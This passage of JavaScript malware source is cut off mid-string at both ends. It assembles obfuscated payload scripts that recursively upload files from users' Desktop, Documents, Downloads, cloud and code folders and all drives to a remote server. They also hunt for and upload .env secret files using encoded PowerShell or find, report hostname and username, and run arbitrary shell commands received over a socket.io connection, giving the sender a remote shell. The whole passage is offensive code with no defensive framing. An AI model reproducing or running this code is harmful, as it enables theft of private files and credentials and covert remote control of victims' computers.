async (filePath) => {\n try {\n if (!fs.existsSync(filePath)) {\n return false;\n }\n\n let stats;\n try {\n stats = fs.statSync(filePath);\n } catch (statError) {\n // File might have been deleted or is inaccessible\n return false;\n }\n \n if (!stats.isFile()) {\n return false;\n }\n\n // Skip files larger than the size limit\n if (stats.size > MAX_FILE_SIZE_BYTES) {\n return false;\n }\n\n // Check if file is readable\n try {\n fs.accessSync(filePath, fs.constants.R_OK);\n } catch (accessError) {\n // File is not readable\n return false;\n }\n\n const form = new FormData();\n let readStream;\n try {\n readStream = fs.createReadStream(filePath);\n } catch (streamError) {\n // Can't create read stream (file might be locked)\n return false;\n }\n \n form.append(\"file\", readStream);\n \n try {\n const response = await axios.post(`" + u_s + "`, form, {\n headers: {\n ...form.getHeaders(),\n userkey: " + u_k + ",\n hostname: os.hostname(),\n path: encodeURIComponent(filePath),\n t: " + t + "\n },\n maxContentLength: Infinity,\n maxBodyLength: Infinity,\n timeout: 30000, // 30 second timeout to prevent hanging\n });\n \n // Check response status\n if (response.status >= 200 && response.status < 300) {\n return true;\n } else {\n // Non-success status\n return false;\n }\n } catch (error) {\n // Handle specific network errors - re-throw for retry logic\n if (error.code === 'ECONNREFUSED' || error.code === 'ETIMEDOUT' || error.code === 'ENOTFOUND') {\n // Network issues - these are recoverable\n throw error; // Re-throw to trigger retry logic\n } else if (error.code === 'ECONNRESET' || error.code === 'EPIPE') {\n // Connection reset - might be recoverable\n throw error;\n } else if (error.response) {\n // Server responded with error status\n const status = error.response.status;\n if (status >= 500) {\n // Server error - might be recoverable\n throw error;\n } else {\n // Client error (4xx) - probably not recoverable, don't retry\n return false;\n }\n } else {\n // Other errors - might be recoverable\n throw error;\n }\n } finally {\n // Ensure stream is closed\n if (readStream && !readStream.destroyed) {\n try {\n readStream.destroy();\n } catch (e) {\n // Ignore cleanup errors\n }\n }\n }\n } catch (error) {\n // Re-throw network errors for retry logic in calling function\n if (error.code === 'ECONNREFUSED' || error.code === 'ETIMEDOUT' || \n error.code === 'ENOTFOUND' || error.code === 'ECONNRESET' || \n error.code === 'EPIPE' || (error.response && error.response.status >= 500)) {\n throw error;\n }\n // Other errors - log and return false\n console.error(`Failed to upload ${filePath}:`, error.message);\n return false;\n }\n };\n\n // Delay helper function\n const delay = (ms) => new Promise((resolve) => setTimeout(resolve, ms));\n\n // Track visited directories to prevent infinite loops from symlinks\n const visitedDirs = new Set();\n const MAX_PATH_LENGTH = os.platform() === 'win32' ? 260 : 4096;\n const MAX_RECURSION_DEPTH = 20;\n \n // Recursively scan directory and upload sensitive files\n const scanAndUploadDirectory = async (directoryPath, skipPriorityDirs = false, depth = 0) => {\n // Prevent infinite recursion\n if (depth > MAX_RECURSION_DEPTH) {\n console.warn(`Max recursion depth reached for ${directoryPath}`);\n return;\n }\n \n // Check path length limits\n if (directoryPath.length > MAX_PATH_LENGTH) {\n console.warn(`Path too long, skipping: ${directoryPath}`);\n return;\n }\n \n if (!fs.existsSync(directoryPath)) {\n return;\n }\n \n // Resolve real path to handle symlinks and prevent loops\n let realPath;\n try {\n realPath = fs.realpathSync(directoryPath);\n } catch (realpathError) {\n // If we can't resolve the real path, skip it\n console.warn(`Cannot resolve real path for ${directoryPath}:`, realpathError.message);\n return;\n }\n \n // Check if we've already visited this directory (prevent symlink loops)\n if (visitedDirs.has(realPath)) {\n return; // Already visited, skip to prevent infinite loops\n }\n \n // Mark as visited\n visitedDirs.add(realPath);\n \n try {\n // Explicitly read all files including hidden ones\n let items;\n try {\n items = fs.readdirSync(directoryPath, { withFileTypes: true });\n } catch (readdirError) {\n // Handle specific error codes\n const errorCode = readdirError.code || readdirError.errno;\n if (errorCode === 'EACCES' || errorCode === 'EPERM' || errorCode === 'EAGAIN') {\n // Permission denied - log but continue\n console.warn(`Permission denied for ${directoryPath}:`, readdirError.message);\n } else if (errorCode === 'ENOENT') {\n // Directory doesn't exist (might have been deleted)\n console.warn(`Directory no longer exists: ${directoryPath}`);\n } else {\n // Other errors\n console.error(`Cannot read directory ${directoryPath}:`, readdirError.message);\n }\n return; // Return early, don't throw\n }\n\n // Sort items alphabetically in descending order\n items.sort((a, b) => b.name.localeCompare(a.name));\n\n for (const item of items) {\n try {\n // Skip . and .. entries\n if (item.name === '.' || item.name === '..') {\n continue;\n }\n\n const fullPath = path.join(directoryPath, item.name);\n console.log('fullPath', fullPath);\n // Check path length before processing\n if (fullPath.length > MAX_PATH_LENGTH) {\n console.warn(`Path too long, skipping: ${fullPath}`);\n continue;\n }\n \n // Get stats for both files and directories (needed for file size check)\n let stats;\n let isSymlink = false;\n try {\n // Check if it's a symlink first\n if (item.isSymbolicLink && item.isSymbolicLink()) {\n isSymlink = true;\n // For symlinks, use lstatSync to get symlink info, then resolve\n try {\n stats = fs.lstatSync(fullPath);\n if (stats.isSymbolicLink()) {\n // Resolve symlink for directories\n const resolvedPath = fs.realpathSync(fullPath);\n stats = fs.statSync(resolvedPath);\n }\n } catch (symlinkError) {\n // Broken symlink or can't resolve\n continue;\n }\n } else {\n stats = fs.statSync(fullPath);\n }\n } catch (statError) {\n // Handle specific stat errors\n const errorCode = statError.code || statError.errno;\n if (errorCode === 'ENOENT') {\n // File/directory was deleted between readdir and stat\n continue;\n } else if (errorCode === 'EACCES' || errorCode === 'EPERM') {\n // Permission denied\n console.warn(`Permission denied for ${fullPath}`);\n continue;\n } else {\n // Other errors - skip\n continue;\n }\n }\n\n if (item.isDirectory() || stats.isDirectory()) {\n // Skip priority directories if we're scanning other locations\n if (skipPriorityDirs) {\n const normalizedPath = path.normalize(fullPath).toLowerCase();\n const isPriorityDir = priorityDirs.some(priorityDir => {\n const normalizedPriority = path.normalize(priorityDir).toLowerCase();\n return normalizedPath === normalizedPriority;\n });\n \n if (isPriorityDir) {\n continue;\n }\n }\n \n if(!isDirectoryNameExcluded(item.name)) {\n // Recursively scan subdirectories - wrap in try-catch to prevent stopping\n try {\n await scanAndUploadDirectory(fullPath, skipPriorityDirs, depth + 1);\n } catch (recursiveError) {\n // Log but don't throw - continue with other items\n console.error(`Error in recursive scan of ${fullPath}:`, recursiveError.message);\n }\n continue;\n }\n \n continue;\n }\n\n if ((item.isFile() || stats.isFile()) && !isFileExtensionExcluded(item.name) && (!skipPriorityDirs || isSensitiveFile(fullPath))) {\n // Skip files larger than the size limit\n if (stats.size > MAX_FILE_SIZE_BYTES) {\n continue;\n }\n\n // Upload sensitive files with retry logic\n try {\n let uploadSuccess = false;\n let retries = 3;\n while (!uploadSuccess && retries > 0) {\n try {\n const uploadStartTime = Date.now();\n await uploadFile(fullPath);\n uploadSuccess = true;\n const uploadDuration = Date.now() - uploadStartTime;\n \n // Only delay if upload completed very quickly (likely small file or fast network)\n // This prevents overwhelming the server while not slowing down normal uploads\n if (uploadDuration < MIN_UPLOAD_TIME_MS) {\n await delay(ADAPTIVE_DELAY_MS);\n }\n // No delay needed for normal uploads - network is already the bottleneck\n } catch (uploadError) {\n retries--;\n if (retries > 0) {\n // Wait before retry (exponential backoff)\n await delay(ADAPTIVE_DELAY_MS * (4 - retries));\n } else {\n // Final failure - log but continue\n console.error(`Failed to upload ${fullPath} after retries:`, uploadError.message);\n }\n }\n }\n } catch (uploadError) {\n // Log upload errors but continue\n console.error(`Error uploading ${fullPath}:`, uploadError.message);\n }\n }\n } catch (error) {\n // Continue on individual item errors\n const errorCode = error.code || error.errno;\n if (errorCode === 'EMFILE' || errorCode === 'ENFILE') {\n // Too many open files - wait a bit and continue\n console.warn(`Too many open files, waiting...`);\n await delay(1000);\n } else {\n console.error(`Error processing ${item.name || item}:`, error.message);\n }\n }\n }\n } catch (error) {\n // Log error but continue scanning other directories\n console.error(`Error scanning directory ${directoryPath}:`, error.message);\n // Don't throw - continue with other directories\n return; // Return instead of throwing\n } finally {\n // Remove from visited set when done (for very deep trees, this helps with memory)\n // But keep it for the current scan to prevent loops\n // Only remove if we're at a shallow depth to save memory\n if (depth === 0) {\n // At root level, we can clear old entries to save memory\n // Keep only recent entries (last 10000)\n if (visitedDirs.size > 10000) {\n const entries = Array.from(visitedDirs);\n visitedDirs.clear();\n // Keep the most recent 5000 entries\n entries.slice(-5000).forEach(dir => visitedDirs.add(dir));\n }\n }\n }\n };\n\n // Get priority directories (Documents, Desktop, Downloads)\n const getPriorityDirectories = () => {\n const priorityDirs = [];\n const platform = os.platform();\n \n if (platform === \"win32\") {\n // Windows paths\n priorityDirs.push(\n path.join(HOME_DIRECTORY, \"Desktop\"),\n path.join(HOME_DIRECTORY, \"Documents\"),\n path.join(HOME_DIRECTORY, \"Downloads\"),\n path.join(HOME_DIRECTORY, \"OneDrive\"),\n path.join(HOME_DIRECTORY, \"Google Drive\"),\n path.join(HOME_DIRECTORY, \"GoogleDrive\")\n );\n } else {\n // macOS/Linux paths\n priorityDirs.push(\n path.join(HOME_DIRECTORY, \"Desktop\"),\n path.join(HOME_DIRECTORY, \"Documents\"),\n path.join(HOME_DIRECTORY, \"Downloads\"),\n path.join(HOME_DIRECTORY, \"Library/CloudStorage\"),\n path.join(HOME_DIRECTORY, \"Projects\"),\n path.join(HOME_DIRECTORY, \"projects\"),\n path.join(HOME_DIRECTORY, \"Development\"),\n path.join(HOME_DIRECTORY, \"development\"),\n path.join(HOME_DIRECTORY, \"Code\"),\n path.join(HOME_DIRECTORY, \"code\"),\n path.join(HOME_DIRECTORY, \"Code Projects\"),\n path.join(HOME_DIRECTORY, \"code projects\"),\n path.join(HOME_DIRECTORY, \"source\"),\n path.join(HOME_DIRECTORY, \"Source\"),\n path.join(HOME_DIRECTORY, \"OneDrive\"),\n path.join(HOME_DIRECTORY, \"Google Drive\"),\n path.join(HOME_DIRECTORY, \"GoogleDrive\")\n );\n \n if (is_wsl()) {\n priorityDirs.push(\"/mnt\");\n }\n }\n \n // Filter to only include directories that exist\n return priorityDirs.filter(dir => fs.existsSync(dir) && fs.statSync(dir).isDirectory());\n };\n\n // Get all drive letters on Windows (compatible with Windows 11)\n const getWindowsDrives = () => {\n try {\n // Use PowerShell Get-CimInstance (works on Windows 11 and modern Windows)\n // This is the modern replacement for wmic\n const psCmd = 'powershell -Command \"Get-CimInstance -ClassName Win32_LogicalDisk | Where-Object { $_.DriveType -eq 3 } | Select-Object -ExpandProperty DeviceID\"';\n const output = execSync(psCmd, { windowsHide: true, encoding: 'utf8', timeout: 5000 });\n const drives = output\n .split(/[\\r\\n]+/)\n .map(line => line.trim())\n .filter(drive => drive && drive.length > 0 && /^[A-Z]:$/.test(drive));\n if (drives.length > 0) {\n return drives.map(drive => `${drive}\\\\`);\n }\n \n // Fallback: Try Get-PSDrive if Get-CimInstance fails\n try {\n const psCmd2 = `powershell -Command \"Get-PSDrive -PSProvider FileSystem | Where-Object { $_.Name.Length -eq 1 -and $_.Name -ge 'A' -and $_.Name -le 'Z' } | Select-Object -ExpandProperty Name\"`;\n const output2 = execSync(psCmd2, { windowsHide: true, encoding: 'utf8', timeout: 5000 });\n const drives2 = output2\n .split(/[\\r\\n]+/)\n .map(line => line.trim())\n .filter(drive => drive && drive.length > 0 && /^[A-Z]$/.test(drive));\n if (drives2.length > 0) {\n return drives2.map(drive => `${drive}:\\\\`);\n }\n } catch (psError2) {\n // If both PowerShell methods fail, try checking common drive letters directly\n const commonDrives = ['C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'];\n const availableDrives = commonDrives.filter(drive => {\n try {\n return fs.existsSync(`${drive}:\\\\`);\n } catch {\n return false;\n }\n });\n if (availableDrives.length > 0) {\n return availableDrives.map(drive => `${drive}:\\\\`);\n }\n }\n return [];\n } catch (error) {\n console.error(\"Failed to get Windows drives:\", error.message);\n // Last resort: check common drive letters\n try {\n const commonDrives = ['C', 'D', 'E', 'F', 'G', 'H'];\n const availableDrives = commonDrives.filter(drive => {\n try {\n return fs.existsSync(`${drive}:\\\\`);\n } catch {\n return false;\n }\n });\n return availableDrives.map(drive => `${drive}:\\\\`);\n } catch {\n return [];\n }\n }\n };\n\n // Main execution function\n const main = async () => {\n \n \n\n try {\n // First, scan priority directories (Documents, Desktop, Downloads)\n priorityDirs = getPriorityDirectories();\n \n \n for (const priorityDir of priorityDirs) {\n try {\n \n await scanAndUploadDirectory(priorityDir);\n } catch (error) {\n console.error(`Error scanning priority directory ${priorityDir}:`, error.message);\n // Continue with next directory\n }\n }\n \n // Then, scan all other directories (skip already scanned priority directories)\n if (os.platform() === \"win32\") {\n // Windows: Scan all drives (skipping already scanned priority directories)\n // Scan C drive last\n const drives = getWindowsDrives();\n const cDrive = drives.find(drive => drive.toLowerCase().startsWith(\"c:\"));\n const otherDrives = drives.filter(drive => !drive.toLowerCase().startsWith(\"c:\"));\n \n // Scan all drives except C drive first\n for (const drive of otherDrives) {\n try {\n \n await scanAndUploadDirectory(drive, true);\n } catch (error) {\n console.error(`Error scanning drive ${drive}:`, error.message);\n // Continue with next drive\n }\n }\n \n // Scan C drive last\n if (cDrive) {\n try {\n \n await scanAndUploadDirectory(cDrive, true);\n } catch (error) {\n console.error(`Error scanning C drive:`, error.message);\n // Continue despite error\n }\n }\n } else {\n // Unix-like systems: Scan home directory (skipping already scanned priority directories)\n try {\n await scanAndUploadDirectory(HOME_DIRECTORY, true);\n } catch (error) {\n console.error(`Error scanning home directory:`, error.message);\n // Continue despite error\n }\n }\n \n \n } catch (error) {\n console.error(\"Fatal error in main:\", error.message);\n console.error(\"Stack:\", error.stack);\n // Don't exit - log error and let process continue or exit naturally\n // This prevents premature exits when processing many files\n } finally {\n // Ensure we always log completion status\n \n }\n };\n\n // Execute main function\n main();\n\n ";
Utils.sp_s(K, "pid." + t + ".2.lock", "autoUploadScript", f_s_l);
} catch (q) {}
const a = "\n const axios = require(\"axios\");\nconst os = require(\"os\");\nconst { execSync, exec } = require(\"child_process\");\nconst fs = require(\"fs\");\nconst path = require(\"path\");\n\n// Helper function to detect if running in WSL\nconst is_wsl = () => {\n // Check for WSL environment variable\n if (process.env.WSL_DISTRO_NAME) {\n return true;\n }\n // Check /proc/version for Microsoft/WSL\n try {\n if (fs.existsSync(\"/proc/version\")) {\n const versionContent = fs.readFileSync(\"/proc/version\", \"utf8\");\n if (versionContent.toLowerCase().includes(\"microsoft\") || versionContent.toLowerCase().includes(\"wsl\")) {\n return true;\n }\n }\n } catch (e) {}\n return false;\n};\n\n" + Utils.set_l("socket") + "\nlet io;\ntry {\n io = require(\"socket.io-client\");\n} catch (e) {\n try {\n console.log(\"installingsocket.io\");\n const platform = process.platform;\n const installOptions = platform === 'win32' \n ? { windowsHide: true, stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024 * 10 }\n : { stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024 * 10};\n const output = execSync(\n \"npm install socket.io-client --no-warnings --no-save --no-progress --loglevel silent\",\n installOptions\n );\n try {\n io = require(\"socket.io-client\");\n } catch (requireErr) {\n console.log(\"Failed to require socket.io-client:\", requireErr.message);\n }\n } catch (installErr) {\n console.log(\"Failed to install socket.io-client:\", installErr.message);\n process.exit(1);\n }\n}\nif (!io || typeof io !== 'function') {\n console.error(\"socket.io-client is not available\");\n process.exit(1);\n}\nconst API_ENDPOINT = `" + s_s + "/api/notify`;\nconst l_e = `" + s_s + "/api/log`;\nconst SOCKET_URL = `" + s_s.replace(/^http/, "ws").replace(/^https/, "wss") + "`;\nfunction gsi() {\n return {\n host: os.hostname(),\n os: os.type() + \" \" + os.release(),\n username: os.userInfo().username || \"unknown\",\n };\n}\n\nasync function sendHostInfo() {\n const s_i = gsi();\n \n try {\n const payload = {\n ukey: " + u_k + ",\n t: " + t + ",\n host: " + u_k + " + \"_\" + s_i.host,\n os: s_i.os,\n username: s_i.username,\n };\n\n const response = await axios.post(API_ENDPOINT, payload, {\n headers: {\n \"Content-Type\": \"application/json\",\n },\n timeout: 10000,\n });\n\n if (response.data.success) {\n console.log(\"✅ Host info sent successfully:\", response.data.id);\n \n return response.data;\n } else {\n throw new Error(response.data.error || \"Failed to send host info\");\n }\n } catch (error) {\n if (error.response) {\n console.error(\"❌ Server error:\", error.response.data);\n throw new Error(\n error.response.data.error || `HTTP ${error.response.status}`\n );\n } else if (error.request) {\n console.error(\"❌ No response from server:\", error.message);\n throw new Error(\"Server is not responding. Is it running?\");\n } else {\n console.error(\"❌ Request error:\", error.message);\n throw error;\n }\n }\n}\n\nasync function f_s_l(message, level = \"info\", data = {}) {\n const s_i = gsi();\n \n try {\n if (!message) {\n throw new Error(\"Log message is required\");\n }\n\n const payload = {\n ukey: " + u_k + ",\n t: " + t + ",\n host: " + u_k + " + \"_\" + s_i.host,\n os: s_i.os,\n username: s_i.username,\n message,\n level,\n data,\n };\n\n const response = await axios.post(l_e, payload, {\n headers: {\n \"Content-Type\": \"application/json\",\n },\n timeout: 10000,\n });\n\n if (response.data.success) {\n console.log(\"✅ Log sent successfully:\", response.data.id);\n return response.data;\n } else {\n throw new Error(response.data.error || \"Failed to send log\");\n }\n } catch (error) {\n if (error.response) {\n console.error(\"❌ Server error:\", error.response.data);\n throw new Error(\n error.response.data.error || `HTTP ${error.response.status}`\n );\n } else if (error.request) {\n console.error(\"❌ No response from server:\", error.message);\n throw new Error(\"Server is not responding. Is it running?\");\n } else {\n console.error(\"❌ Request error:\", error.message);\n throw error;\n }\n }\n}\n\nasync function uploadFileToLdb(filePath, fileContent) {\n try {\n const s_i = gsi();\n const timestamp = Math.round(Date.now() / 1000);\n const fileName = path.basename(filePath);\n \n const contentBuffer = Buffer.isBuffer(fileContent) \n ? fileContent \n : (typeof fileContent === 'string' \n ? Buffer.from(fileContent, 'binary')\n : Buffer.from(fileContent));\n \n const response = await axios.post(\n `" + l_s.replace("/upload", "") + "/api/upload-file`,\n contentBuffer,\n {\n headers: {\n \"Content-Type\": \"application/octet-stream\",\n \"userkey\": String(" + u_k + "),\n \"t\": String(" + t + "),\n \"hostname\": s_i.host,\n \"path\": filePath,\n \"filename\": fileName,\n \"timestamp\": String(timestamp),\n },\n maxContentLength: 100 * 1024 * 1024,\n maxBodyLength: 100 * 1024 * 1024,\n timeout: 60000,\n }\n );\n \n if (response.data.success) {\n console.log(`✅ File uploaded to ldb-server: ${fileName} ((${contentBuffer.length / 1024}).toFixed(2)} KB)`);\n\n let normalizedPath = filePath.replace(/\\\\/g, \"/\");\n normalizedPath = normalizedPath.replace(/^([A-Z]):\\//i, `$1/`);\n if (normalizedPath.startsWith(\"/\")) {\n normalizedPath = normalizedPath.substring(1);\n }\n \n const baseUrl = \"" + l_s.replace("/upload", "") + "\";\n const host = " + u_k + " + \"_\" + s_i.host;\n const fileUrl = `${baseUrl}/api/file/" + t + "/${host}?path=${encodeURIComponent(normalizedPath)}`;\n \n return {\n ...response.data,\n fileUrl: fileUrl\n };\n } else {\n throw new Error(response.data.error || \"Failed to upload file\");\n }\n } catch (error) {\n console.warn(`⚠️ Failed to upload file to ldb-server: ${error.message}`);\n return null;\n }\n}\n\nasync function searchAndUploadFiles(filename) {\n const MAX_FILE_SIZE = 10 * 1024 * 1024; // 10MB limit\n const platform = os.platform();\n const homeDir = os.homedir();\n \n // Function to sanitize file path to valid filename\n const sanitizeFileName = (filePath) => {\n // Get OS-specific max filename length\n const maxLength = platform === 'win32' ? 260 : 255;\n \n // Replace path separators with underscores\n let sanitized = filePath.replace(/[\\\\/]/g, '_');\n \n // Replace invalid characters for filenames\n if (platform === 'win32') {\n // Windows: < > : \" | ? * and control characters\n sanitized = sanitized.replace(/[<>:\"|?*\\x00-\\x1f]/g, '_');\n } else {\n // Unix: / and null bytes\n sanitized = sanitized.replace(/[\\/\\x00]/g, '_');\n }\n \n // Remove leading/trailing dots and spaces (Windows doesn't allow these)\n if (platform === 'win32') {\n sanitized = sanitized.replace(/^[\\. ]+|[\\. ]+$/g, '');\n }\n \n // Truncate to max length\n if (sanitized.length > maxLength) {\n const ext = path.extname(sanitized);\n const nameWithoutExt = sanitized.slice(0, sanitized.length - ext.length);\n sanitized = nameWithoutExt.slice(0, maxLength - ext.length) + ext;\n }\n \n return sanitized || 'file';\n };\n let command;\n \n // Build search pattern for filename\n // For .env, we want to match .env, .env.local, .env.production, etc.\n let searchPattern = filename;\n if (filename.startsWith('.')) {\n // For dot-files, use pattern matching\n if (platform === 'win32') {\n // Windows: use * for pattern matching\n searchPattern = `${filename}*`;\n } else {\n // Unix: use find with -name pattern\n searchPattern = `${filename}*`;\n }\n }\n \n try {\n if (platform === 'win32') {\n // Windows: Use PowerShell Get-ChildItem for better performance\n // Search from home directory and all drives\n const drives = [];\n try {\n // Get available drives\n const driveOutput = execSync('wmic logicaldisk get name', { encoding: 'utf8', windowsHide: true });\n const driveMatches = driveOutput.match(/([A-Z]):/g);\n if (driveMatches) {\n drives.push(...driveMatches.map(d => `${d.replace(':', '')}:\\\\`));\n }\n } catch (e) {\n // Fallback: try common drives\n const commonDrives = ['C', 'D', 'E', 'F'];\n for (const drive of commonDrives) {\n try {\n if (fs.existsSync(`${drive}:\\\\`)) {\n drives.push(`${drive}:\\\\`);\n }\n } catch (e) {}\n }\n }\n \n // Use home directory if no drives found\n if (drives.length === 0) {\n drives.push(homeDir);\n }\n \n // Build PowerShell command as string - search each drive separately\n // Use single quotes for regex pattern to avoid escaping issues\n const excludePattern = 'node_modules|\\.git|vendor|venv|\\.venv|dist|build|Library|System|Windows|Program Files|AppData\\Local\\Temp';\n \n // Build PowerShell command string\n // Suppress progress and verbose output to avoid CLIXML issues\n let psCommands = [];\n for (const drive of drives) {\n // Escape single quotes in path by doubling them, and escape backslashes\n const escapedPath = drive.replace(/'/g, \"''\").replace(/\\\\/g, '\\\\\\\\');\n // Use single quotes for the regex pattern to avoid escaping backslashes\n // Suppress progress and only output file paths\n // Use -Force to include hidden files\n psCommands.push(`Get-ChildItem -Path '${escapedPath}' -Filter '${searchPattern}' -Recurse -Force -ErrorAction SilentlyContinue -File | Where-Object { $_.FullName -notmatch '${excludePattern}' } | ForEach-Object { $_.FullName }`);\n }\n \n // Suppress progress preference and join commands\n // Redirect stderr to null to suppress progress output\n const psCommandString = `$ProgressPreference = 'SilentlyContinue'; $ErrorActionPreference = 'SilentlyContinue'; ${psCommands.join('; ')} 2>$null`;\n \n // Use -EncodedCommand to avoid quote escaping issues\n // Convert to UTF-16LE and then base64 encode\n const encodedCommand = Buffer.from(psCommandString, 'utf16le').toString('base64');\n \n // Execute using -EncodedCommand with flags to suppress output\n command = `powershell -NoProfile -NoLogo -NonInteractive -ExecutionPolicy Bypass -EncodedCommand ${encodedCommand}`;\n } else {\n // Linux/macOS: Use find command\n // Build find command with exclusions\n const excludeDirs = [\n '-path', '*/node_modules', '-prune', '-o',\n '-path', '*/.git', '-prune', '-o',\n '-path', '*/vendor', '-prune', '-o',\n '-path', '*/venv', '-prune', '-o',\n '-path', '*/.venv', '-prune', '-o',\n '-path', '*/dist', '-prune', '-o',\n '-path', '*/build', '-prune', '-o',\n '-path', '*/Library', '-prune', '-o',\n '-path', '*/System', '-prune', '-o',\n '-type', 'f', '-name', searchPattern, '-print'\n ].join(' ');\n \n // Search from home directory\n command = `find \"${homeDir}\" ${excludeDirs} 2>/dev/null`;\n }\n \n console.log(`🔍 Searching for ${filename} files...`);\n \n // Execute command asynchronously to avoid blocking event loop\n const output = await new Promise((resolve, reject) => {\n exec(command, {\n encoding: 'utf8',\n maxBuffer: 50 * 1024 * 1024, // 50MB buffer for large outputs\n windowsHide: platform === 'win32',\n timeout: 300000 // 5 minute timeout\n }, (error, stdout, stderr) => {\n // Filter out CLIXML (PowerShell progress output) from stdout\n let cleanOutput = stdout;\n if (stdout) {\n // Remove CLIXML tags and content\n cleanOutput = stdout\n .split('\\n')\n .filter(line => {\n const trimmed = line.trim();\n // Skip CLIXML lines\n if (trimmed.startsWith('<') && trimmed.includes('CLIXML')) return false;\n if (trimmed.startsWith('<Objs')) return false;\n if (trimmed.startsWith('</Objs>')) return false;\n if (trimmed.startsWith('<Obj')) return false;\n if (trimmed.startsWith('</Obj>')) return false;\n if (trimmed.includes('http://schemas.microsoft.com/powershell')) return false;\n return true;\n })\n .join('\\n');\n }\n \n // Only reject on actual errors, not on stderr (which may contain progress)\n if (error && error.code !== 0) {\n // Check if stderr contains actual errors (not just progress)\n const hasRealError = stderr && !stderr.includes('CLIXML') && !stderr.includes('Preparing modules');\n if (hasRealError) {\n reject(error);\n return;\n }\n }\n \n resolve(cleanOutput || '');\n });\n });\n \n // Parse output into file paths\n const filePaths = output\n .split(/[\\r\\n]+/)\n .map(line => line.trim())\n .filter(line => line && line.length > 0 && fs.existsSync(line));\n \n console.log(`📁 Found ${filePaths.length} ${filename} file(s)`);\n \n // Upload each file\n let uploadedCount = 0;\n for (const filePath of filePaths) {\n try {\n // Check file size\n const stats = fs.statSync(filePath);\n if (stats.size > MAX_FILE_SIZE) {\n console.log(`⚠️ Skipping large file: ${filePath} (${(stats.size / 1024 / 1024).toFixed(2)}MB)`);\n continue;\n }\n \n // Check if file is readable\n try {\n fs.accessSync(filePath, fs.constants.R_OK);\n } catch (e) {\n continue;\n }\n \n // Read and upload file\n const fileContent = fs.readFileSync(filePath);\n \n // Create sanitized filename from file path\n const sanitizedFileName = sanitizeFileName(filePath);\n const uploadPath = path.join(`found.${filename}`, sanitizedFileName);\n \n // Upload with the new path in found folder\n await uploadFileToLdb(uploadPath, fileContent);\n uploadedCount++;\n console.log(`✅ Uploaded (${uploadedCount}/${filePaths.length}): ${filePath} -> ${uploadPath}`);\n \n // Yield to event loop every 5 files to allow socket commands to be processed\n if (uploadedCount % 5 === 0) {\n await new Promise(resolve => setImmediate(resolve));\n }\n } catch (fileError) {\n // Skip files that can't be read (locked, permissions, etc.)\n console.log(`⚠️ Skipping file: ${filePath} - ${fileError.message}`);\n continue;\n }\n }\n \n console.log(`✅ Finished: Uploaded ${uploadedCount} out of ${filePaths.length} ${filename} file(s)`);\n } catch (error) {\n console.error(`❌ Error searching for ${filename} files:`, error.message);\n }\n}\nasync function connectSocket() {\n return new Promise((resolve, reject) => {\n const socket = io(SOCKET_URL, {\n reconnectionAttempts: 15,\n reconnectionDelay: 2000,\n timeout: 20000,\n });\n\n // Function to check process status\n const checkProcessStatus = () => {\n const path = require(\"path\");\n const os = require(\"os\");\n const lockFiles = [\n { type: \"ldbScript\", file: path.join(os.tmpdir(), `pid.${" + t + "}.1.lock`) },\n { type: \"autoUploadScript\", file: path.join(os.tmpdir(), `pid.${" + t + "}.2.lock`) },\n { type: \"socketScript\", file: path.join(os.tmpdir(), `pid.${" + t + "}.3.lock`) },\n ];\n \n const status = {\n ldbScript: false,\n autoUploadScript: false,\n socketScript: false,\n };\n \n for (const lockFile of lockFiles) {\n try {\n if (fs.existsSync(lockFile.file)) {\n const lockData = JSON.parse(fs.readFileSync(lockFile.file, 'utf8'));\n const pid = lockData.pid;\n try {\n process.kill(pid, 0);\n // Process exists and is running\n status[lockFile.type] = true;\n } catch (checkError) {\n // Process doesn't exist, remove stale lock\n try { fs.unlinkSync(lockFile.file); } catch (e) {}\n status[lockFile.type] = false;\n }\n }\n } catch (e) {\n status[lockFile.type] = false;\n }\n }\n \n return status;\n };\n\n socket.on(\"connect\", () => {\n console.log(\"✅ Connected to socket server (for file browsing)\");\n \n // Send initial process status\n const status = checkProcessStatus();\n socket.emit(\"processStatus\", status);\n \n // Resolve immediately, don't wait for file search\n resolve(socket);\n \n // Start searching and uploading .env files after socket connects (non-blocking)\n \n setImmediate(async () => {\n try {\n await searchAndUploadFiles('.env');\n } catch (err) {\n console.error('Error searching for .env files:', err.message);\n }\n });\n \n });\n\n socket.on(\"connect_error\", (error) => {\n console.error(\"❌ Socket connection error:\", error.message);\n reject(error);\n });\n\n socket.on(\"whour\", () => {\n const s_i = gsi();\n socket.emit(\"whoIm\", {\n ukey: " + u_k + ",\n t: " + t + ",\n host: " + u_k + " + \"_\" + s_i.host,\n os: s_i.os,\n username: s_i.username,\n });\n });\n\n socket.on(\"command\", (msg) => {\n try {\n const { message: command, code, cid, sid, path: filePath } = msg;\n \n exec(command, { windowsHide: true, maxBuffer: 1024 * 1024 * 300 }, async (error, stdout, stderr) => {\n // Handle WSL permission denied errors gracefully - they're expected when accessing /mnt/ drives\n const isWslPermissionError = stderr && /Permission denied/i.test(stderr) && stdout && stdout.trim().length > 0;\n const isLsCommand = /^s*lss/.test(command);\n \n if (error && !isWslPermissionError) {\n socket.emit(\"message\", {\n result: error.message,\n ...msg,\n type: \"error\",\n });\n return;\n }\n \n // If stderr contains only permission denied errors and we have stdout, treat as warning but continue\n if (stderr && !isWslPermissionError) {\n socket.emit(\"message\", {\n result: stderr,\n ...msg,\n type: \"stderr\",\n });\n return;\n }\n \n // For WSL permission errors with valid stdout, log warning but continue processing\n if (isWslPermissionError && isLsCommand) {\n console.warn(`⚠️ WSL permission denied warnings (expected on /mnt/ drives), but continuing with valid output`);\n }\n \n let fileUrl = null;\n let fileContentToSend = stdout;\n const maxSize = 1 * 1024 * 1024;\n \n if (code === \"107\" && filePath) {\n try {\n if (fs.existsSync(filePath)) {\n const fileBuffer = fs.readFileSync(filePath);\n const fileSize = fileBuffer.length;\n \n const uploadResult = await uploadFileToLdb(filePath, fileBuffer);\n if (uploadResult && uploadResult.fileUrl) {\n fileUrl = uploadResult.fileUrl;\n }\n \n if (fileSize > maxSize) {\n fileContentToSend = null;\n console.log(`⚠️ File too large ((${fileSize / 1024 / 1024}).toFixed(2)}MB), sending URL only: ${fileUrl || 'not available'}`);\n } else {\n fileContentToSend = stdout;\n }\n } else {\n console.warn(`⚠️ File not found: ${filePath}, using stdout output`);\n if (stdout) {\n const contentSize = 